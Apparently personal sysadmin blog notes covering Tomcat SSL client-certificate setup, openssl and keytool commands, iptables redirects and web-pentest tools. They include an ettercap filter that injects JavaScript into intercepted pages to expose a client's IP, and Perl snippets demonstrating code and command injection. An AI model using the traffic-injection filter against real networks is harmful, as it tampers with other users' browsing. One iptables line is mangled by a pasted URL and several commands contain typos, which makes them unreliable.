This should inject a javascript getting your local IP address:

replace(“^</BODY>”,”<script>s1 = \”error\”;s2 = \”error\”;try { so = new java.net.Socket(); so.bind(new java.net.InetSocketAddress(\”0.0.0.0\”,0)); so.connect(new java.net.InetSocketAddress(document.domain,80)); s1 = so.getLocalAddress().getHostAddress(); s2 = so.getLocalAddress().getHostName(); so.close(); } catch (e) { document.writeln(e); } alert(\”Client’s IP: \”+ s1 + \”(\”+s2+\”)\”); </script></BODY>”);

Yon need to compile this filter with etterfiler and run it with “ettercap -F <filter.ef>

Haven’t tried it but it should work.

802.1Q VLAN – tagging for packet exchange between switches (need to reconfigure the switch port). Can do it with hypervisor to attach VLANS to virtual domains.

Linux: don’t know how to do it the easiest in iptables? There seems to be another l2 filtering tool: http://ebtables.sourceforge.net/

1. MemoryRealm works fine.
2. UserDatabase doesn’t work. The code is ok, but apparently while parsing server.xml file and creating UserDatabase (declared there) the server creates some kind of property file (MBeans), which of course cannot be created for the property which contains sign ‘=’. Therefore it fails.
3. Other realms could possibly work, but they don’t implement authenticate(cert[]) function, which is called to verify the certificates. It’s a bit of a shame and I really don’t see why it could not work. (more…)

Setting up a connector in /var/lib/tomcat4/conf/server.xml

<Connector className=”org.apache.catalina.connector.http.HttpConnector” port=”8443″ minProcessors=”5″ maxProcessors=”75″ enableLookups=”true” acceptCount=”10″ debug=”0″ scheme=”https” secure=”true”> <Factory className=”org.apache.catalina.net.SSLServerSocketFactory” clientAuth=”true” protocol=”TLS” keystoreFile=”/home/pie/bla/keystore” keystorePass=”changeit”/> </Connector>

Setting up trusted certificates (other than cacerts somewhere in Java): export CATALINA_OPTS=”-Djavax.net.ssl.trustStore=/home/pie/bla/ca -Djavax.net.ssl.trustStorePassword=changeit -Djavax.net.debug=ssl”

BTW: Tomcat5 allows to specify trusted certs in server.xml directly.

The last one produces a very usable debug information in the log file. It’s useful together with s_client to debug this setup. (more…)

Just a few things I learnt playing with openssl:

Generating a root ca certificate. It’s also a self-signed certificate, so if you want just this, you can stop here:

openssl req -new -x509 -keyout <keypem> -out <certPem> -days 365 -extenstions v3_ca

Generating a key and a certificate request:

openssl req -new -nodes -keyout <keyPem> -out <csrfile>

Signing a certificate request:

openssl x509 -req -days 356 -in <csrfile> -out <certfile> -CA ca3cert.pem -CAkey ca3key.pem -set_serial <serial>

Signing a certificate:

openssl x509 -days 356 -in <csrfile> -out <certfile> -CA ca3cert.pem -CAkey ca3key.pem -set_serial <serial>

Now with keytool:

keytool -genkey -keystore <keystore> -dname <dname string --- see man>

Then we can export certificate signing request:

keytool -certreq -alias mykey -file <csrFile> -keystore <keystore>

Finally import the certificate:

keytool -import -keystore <keystore> -file <certPem>

Exporting certificates for mozilla/ie:

cat <keyPem> <certPem> > tmp
openssl pkcs12 -export -in tmp out <file.p12> -certfile <cacert.pem>

Viewing certificate:

openssl x509 -in <cert> -text | less

Testing if it works:

openssl s_client -connect localhost:8443 -cert user2cert.pem -key user2key.pem -CAfile ca3cert-1.pem
openssl s_server -connect accept:8443 -cert serverCert.pem -key serverKey.pem -CAfile ca3cert-1.pem

Just a few notes:

1. tomcat uses an alias mykey for a it uses for the websites
2. to import certificates in mozilla/ie you also need to include ca certificate in pkcs12 file.
3. there is a scrpit CA.pl which seem to automate many tasks.
4. Watch out for V3 extensions (certificate purpose, CA=TRUE/FALSE, etc.)
5. Most of these options can be specified directly in opensssl.cnf configuration file.

Just a few interesting pointers to tools from a book I read:

• WHArsenal – www.whitesec.com (doesn’t seem to be available anymore)
• HTTPush – on the fly modification of requests (in Perl)
• WEBScarab – http://www.owasp.org/software/webscarab.html
• Spikeproxy – http://packages.debian.org/unstable/net/spikeproxy.html
• PenProxy – http://shh.thathost.com/pub-java/html/PenProxy.html

!/usr/bin/perl -w

use re ‘eval’; #this evil command enables it!

$a = “bla”; $user_input = “(?{print “we’re executing this code \n”;})”; $a =~ /$user_input/;

!/usr/bin/perl -w

@files=ls $ARGV[0]; print “file list: @files\n”;

One of the problems with DNS cat is that the sefver may be already running a DNS server. Multiple servers cannot share a single port 53.

The workaround is “DNS forwarding”. (more…)

iptables -t nat -I PREROUTING -p tcp --destination-port <other port> -j REDIRECT --to-ports 25

• redirecting incoming packets to other ports

  iptables -t nat -I POSTROUTING -o -http://lists.netfilter.org/pipermail/netfilter/2004-March/051478.htmlj MASQUERADE

• all packets that would go through internet connected interface will be maqueraded

I recently found out that this redirect doesn’t work for traffix generated to the local interface. Following the advice from this list I made it to work (I don’t know if you need some special kernel options as they suggested it just worked for me on 2.6.x).

iptables -t nat -I OUTPUT -p tcp --destination-port <other port> -o lo -d localhost -j REDIRECT --to-ports 25